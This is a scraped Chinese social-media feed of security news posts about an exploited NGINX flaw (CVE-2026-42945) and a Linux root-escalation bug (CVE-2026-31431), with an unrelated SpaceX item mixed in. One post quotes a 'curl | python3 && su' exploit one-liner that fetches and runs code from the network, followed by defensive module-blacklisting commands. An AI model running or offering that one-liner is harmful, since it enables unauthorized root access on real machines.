NGINX 高危漏洞 CVE-2026-42945 已遭黑客利用,该漏洞影响 NGINX Open Source 与 NGINX Plus 0.6.27 至 1.30.0 版本,可导致 worker 进程崩溃,并在关闭 ASLR 防护情况下实现远程代码执行(RCE)。Ledger CTO Charles Guillemet 表示,目前真正运行最新版本 NGINX 的服务器可能不超过 30%,漏洞传播速度正快于 IT 团队修补与升级速度。
顯示更多
9 个 CVE,135,000 个暴露实例和 1,184 个恶意技能。
OpenClaw 怕是个毒窝吧😅
SpaceX $SPCX 大部分VC和CVC解锁时间线
看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限:
curl | python3 && su CVE-2026-31431
建议尽快更新系统,事态紧急可以先打个补丁
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null
详细参考👉
顯示更多